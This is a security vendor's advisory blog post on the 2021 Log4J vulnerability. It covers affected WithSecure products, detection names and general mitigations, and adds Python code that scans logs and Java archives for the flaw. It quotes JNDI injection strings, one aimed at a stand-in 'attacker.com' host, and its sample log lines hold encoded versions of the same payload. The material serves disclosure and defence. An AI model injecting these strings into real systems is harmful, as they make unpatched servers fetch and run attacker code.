What you need to know about the Log4J vulnerability rocking the internet

Jason Sattler

11.12.21 4 min. read

 

 

 

A vulnerability in the Log4J library identified on Friday, December 10th is rocking software vendors and service providers around the globe. The weakness in the standardized method of handling log messages within software ranging from Microsoft’s Minecraft to ecommerce platforms is already under assault by attackers.

It’s almost impossible to describe the amount of risk that exists in vulnerable apps right now. If a user-controlled string targeting the vulnerability is logged, the exploit can be executed remotely. In the simplest terms, the vulnerability lets an attacker cause the target system to fetch and run code from a remote location. The second stage – what the malicious code does – is fully up to the attacker.

A ‘nearly perfect storm’

This nearly perfect storm is another reminder of how hard it is to secure multiple layers of enterprise software. Legacy software, including older versions of Java, will force many organizations to develop their own patches or prevent them from patching immediately. Another complication comes from the challenge of correctly patching the logging functions of Log4j in real time, right when the threat of attack is so high and logging is so essential.

All recommended mitigations should be applied “immediately”, the Cybersecurity & Infrastructure Security Agency insisted in a blog post.

There’s not much that individual users can do, other than install updates for various online services as they become available. Companies and enterprises, however, will be working non-stop to provide those fixes, as they secure their own systems. And once exposure has been remedied, steps should be taken to assess if an active incident is underway within the affected systems.

Vulnerabilities almost anywhere

Finding an app that doesn’t use the Log4J library may be harder than finding one that does. This omnipresence means attackers can go looking for vulnerabilities almost anywhere.

“Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience,” said Erka Koivunen, WithSecure’s Chief Information Security Officer, half-jokingly.

Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of a phrase like “${jndi:ldap://attacker.com/pwnyourserver}” in a Minecraft chat on an unpatched system, for instance, could set off a security firestorm at Microsoft.
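A defender's check for the lookup string quoted above, as an added example that is not part of the original article or any WithSecure product: it scans log lines for `${jndi:<scheme>://<host>` in plain and percent-encoded form and returns the callback host to review. The function names, the sample log lines and the `callback.example` host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Log4j lookup syntax quoted in the article: ${jndi:<scheme>://<host>/<path>}
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/\s}:]+)", re.IGNORECASE
)

def decode(line, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (access logs keep raw URLs)."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def find_jndi_lookups(lines):
    """Return (line_number, scheme, host) for every JNDI lookup string found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(decode(line)):
            hits.append((number, match["scheme"].lower(), match["host"].lower()))
    return hits

# Constructed sample access-log lines (documentation IP ranges, reserved .example name).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://callback.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET /search?q='
    '%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 200 87 "-" "curl/7.79.1"',
    '198.51.100.7 - - [10/Dec/2021:14:04:02 +0000] "GET /docs/jndi-overview HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, host in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

A hit shows only that the string reached a log; whether the application that logged it was vulnerable, and whether the host was ever contacted, has to be confirmed from outbound connection records.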

Are WithSecure products affected?

WithSecure has identified that the following products are affected by this vulnerability:

  • WithSecure Policy Manager
    • Note: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.
  • WithSecure Policy Manager Proxy
  • WithSecure Endpoint Proxy
  • WithSecure Elements Connector

Both Windows and Linux versions of these products should be considered affected. If your WithSecure product is exposed to the internet, you MUST immediately check and patch if needed.

How can I patch my WithSecure product?

WithSecure has created a deployable security patch for this vulnerability. You can find the instructions and ongoing updates about this vulnerability here.

What protection does WithSecure provide against this vulnerability?

WithSecure Endpoint Protection (EPP) is continuously updated with detection for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.

EPP detections will address any payload seen in the post-exploitation phase as usual, and at this point in time, WithSecure has had the following detections in place that address some serious attack scenarios. These represent malicious payloads that we have seen “in the wild” in connection with Log4j exploits.

  • TR/Drop.Cobacis.AL
  • TR/Rozena.wrdej
  • TR/PShell.Agent.SWR
  • TR/Coblat.G1
  • TR/AD.MeterpreterSC.rywng

Many of these detections have been available in WithSecure EPP for months already, meaning that customers are proactively protected from these payloads.

Other detections present may also help, as there are multiple ways to use the exploit. This list of useful detections will be updated as the situation evolves.

WithSecure Endpoint Detection and Response (EDR) capabilities are effective independently of this specific vulnerability, and malicious activities, particularly those related to post-exploitation, will be detected as normal. We will keep adding new detections on the basis of what we see.

WithSecure Elements Vulnerability Management is being constantly updated to add detections; this page details the current status. It will be updated as new detections are available.

Check the general recommendations in the following section for further mitigations.

What steps should you take in general on all software, regardless of vendor?

Restrict network access, or limit it to trusted sites. If your system cannot connect to the Internet to fetch the malicious code, the attack will fail.

Check regularly with vendors to see if there is information on patches and other mitigations related to vulnerabilities.

Consider WithSecure Elements Vulnerability Management, which can help identify vulnerable systems.

Consider WithSecure Elements Endpoint Protection or WithSecure Business Suite products, which can detect and patch vulnerable software on the system they are installed on.
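For software whose vendor has not yet published guidance, a simple inventory shows where Log4j is bundled. The following is an added example, not WithSecure tooling or code from the original article: it walks a directory tree and reports every Java archive, including archives nested inside WAR/EAR/fat-JAR files, that ships the Log4j 2 class implementing the `jndi` lookup. The function names and the nesting limit are assumptions of this sketch.

```python
import io
import os
import sys
import zipfile

# Class that implements the ${jndi:...} lookup inside log4j-core (Log4j 2.x).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXTS = (".jar", ".war", ".ear")

def scan_archive(data, label, depth=0, max_depth=4):
    """Return labels of archives (this one or nested ones) that contain JNDI_CLASS.

    `data` is a filesystem path or a file-like object; `max_depth` (an assumed
    limit) bounds recursion into archives packed inside other archives.
    """
    found = []
    try:
        with zipfile.ZipFile(data) as archive:
            for name in archive.namelist():
                if name == JNDI_CLASS:
                    found.append(label)
                elif name.lower().endswith(ARCHIVE_EXTS) and depth < max_depth:
                    nested = io.BytesIO(archive.read(name))
                    found += scan_archive(nested, f"{label}!/{name}", depth + 1, max_depth)
    except (zipfile.BadZipFile, OSError, RuntimeError):
        pass  # corrupt, unreadable or encrypted archive: skip it, keep sweeping
    return found

def scan_tree(root):
    """Walk `root` and scan every Java archive found beneath it."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for filename in files:
            if filename.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(folder, filename)
                hits += scan_archive(path, path)
    return sorted(hits)

if __name__ == "__main__":
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("contains JndiLookup.class:", hit)
```

The class is also present in fixed Log4j releases, so a hit marks a candidate to check against the vendor's patch information rather than proof of exposure.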

NOTE: The “What protection does WithSecure provide against this vulnerability?” section was added on December 12 at 12:49 PM UTC and updated at 3:13 PM UTC and on December 14 at 12:05 PM UTC. “Are F-Secure products affected?” was updated on December 13 at 11:46 AM UTC.
